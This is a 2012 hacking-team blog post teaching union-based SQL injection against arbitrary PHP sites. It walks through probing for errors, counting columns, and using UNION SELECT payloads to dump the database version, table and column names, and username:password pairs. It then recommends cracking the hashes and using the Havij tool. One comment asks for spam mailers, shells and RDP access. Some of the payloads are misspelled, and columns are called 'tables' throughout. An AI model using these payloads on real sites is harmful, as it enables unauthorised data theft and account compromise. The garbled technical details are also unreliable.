Union-Based (Basic) SQL Injection – By Georgekok97

Posted: 06/08/2012 in G.N.A.HackTeam, Hacking, Info
Tags: , , , , , , , , , , , , ,

Today, I think you should learn UNION-Based (Basic) SQL Injection!

Here is what to do:

1) Find a site that Uses PHP. It should end in (ex.) php?id=... or …php?p=… (etc.) Then type in the end (or before the last number) . (Single Quote)

ex. http://www.mysite.com/game.php?id=1′

If you get an error, you may proceed. (Means that the Site is Vulnerable!)

2) Erase the single quote you typed before, and type at the end order by 1– and the number shows the number of the tables that the database of the site has.

ex. .com/game.php?id=1 order by 1–(It shouldn’t get any error…)

3) Continue typing numbers (2,4,5,7 etc…) until it get an error. The last number that doesn’t get error is the number of the tables that the Database has!

ex. our site has 4 tables when:
id=1 order by 5– (gets an error)
id=1 order by 4– (doesn’t get error) – So, the number of tables the Site’s database has is 4!

4) this (in our example) will display the table that are vulnerable.
union all select 1,2,3,4–

ex. http://www.site.com/game?id=-1 union all select 1,2,3,4–

(You should see many Numbers at many different areas of the page. – These numbers are the numbers of the vulnerable tables)

5) to find the version of the SQL type @@version instead of the vulnerable table number that is at the top (ALWAYS AT THE TOP).
union all select 1,2,@@version,4–

ex. id=-1 union all select 1,2,3,@@version (if the 3rd table is vulnerable and is at the top – if it is NOT the one that is at the top of the other numbers, the attack will not succeed!)

You should see the MySQL version of the Site. It should be 5.+. If it is less than 5, we need other methods to extract information.

6) to display Table Names type:

ex. union all select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()–

(You see that the SQL Command is inserted at the vulnerable table we got at the “Union all Select” Statement – in our example ‘4‘) — Don’t freak out if it is difficult for you to learn the commands! Take notes and you will learn them after a while…

7) To display the Collum Names we type:

ex. union all select 1,2,3,group_concat(collumn_name) from information_schema.collumns where table_name=CHAR(117, 115, 101, 114, 115)–

The CHAR() is a MySQL Function. You can get the HackBar Add-On for Firefox that can convert a string (like ‘users’) to the appropriate format!

The CHAR() contains Numbers which are the converted format of the Table we need. In this example, “users”

 

8) To display the collumns we want (let’s say “username” and “password”) from a table (let’s say “users”) we type:

ex. union all select 1,2,group_concat(username,0x3a,password),4 from users–

username: collumn to display
password: collumn to display
0x3a: HEX Character: says the browser to display the info like this: user:pass
users: table to search

 

NOTE: The passwords are usually in MD5 hash encryption (or SHA-1). Use a Service to unhash it! Like:
http://www.md5decrypter.co.uk/

That’s it! This was the Union-Based SQL Injection!

_________________________________________________________________________________________

Havij

You can also try Havij, a Nice Program that SQL Injects a Website if a Vulnerability is found!
What you need to do is the 1st Step!

There is a FREE and PAID Version of Havij. Get it here: havij Download Page

_________________________________________________________________________________________

Tutorial By Georgekok97

_________________________________________________________________________________________

Please read the Disclaimer at the About Page!

Advertisements
Comments
  1. This Post has been Updated! Some SQL Commands were Wrong and now are Correct!
    Happy Hacking! :->

  2. Simply want to say your article is as astounding. The clarity for your submit is just excellent and i can suppose you’re a professional in this subject. Fine together with your permission allow me to grab your RSS feed to stay up to date with imminent post. Thanks 1,000,000 and please carry on the gratifying work.

  3. This is simpler and certainly gives convenience to internet users. Many thanks for sharing. Publish similar to this provides fantastic advantage. Thank you!

  4. Nice a person blog operator accomplishment blog put up fantastic sharings with this website at all times have enjoyable

  5. Karlene says:

    oh my god terrific publish admin will test your web site usually

  6. Sepatu Murah says:

    You did a great job. Thanks usefull for me (bad boy). 🙂

  7. Good day my fellow hackers, pls can you help me with a mass sender, i need smtp,mailer, and shell even rdp to upload my link thanks.

  8. […] NOTE: SQL Injection is not demonstrated here! If you don’t know SQL Injection, read this first… […]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s